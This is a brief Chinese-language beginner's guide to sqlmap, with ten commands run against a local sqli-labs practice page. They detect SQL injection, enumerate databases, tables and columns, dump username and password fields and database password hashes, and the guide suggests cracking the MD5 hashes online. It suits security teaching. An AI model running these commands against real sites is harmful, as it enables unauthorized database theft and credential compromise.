sqlmap的使用 ---- 入门

sqlmap是一个自动化的sql注入工具，其主要功能就是扫描、发现给定url的sql注入漏洞。

---

1. 判断是否存在注入

当url中存在两个参数时，要使用双引号

sqlmap -u +url

2. 判断文本中的请求是否存在注入
利用工具burp suite抓包，保存为文本

sqlmap -r +http请求文本

3. 查询当前用户下的所有数据库

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --dbs

4. 获取数据库中的表名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security --tables

5. 获取表中的字段名

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users --columns

6. 获取字段内容

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump

7. 获取数据库中的所有用户

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --users

8. 获取数据库用户的密码

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --passwords
查询到的密码时MD5值，在MD5解密网站即可得到明文密码

9. 获取当前网站数据库的名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-db

10. 获取当前数据库的用户名称

sqlmap -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --current-user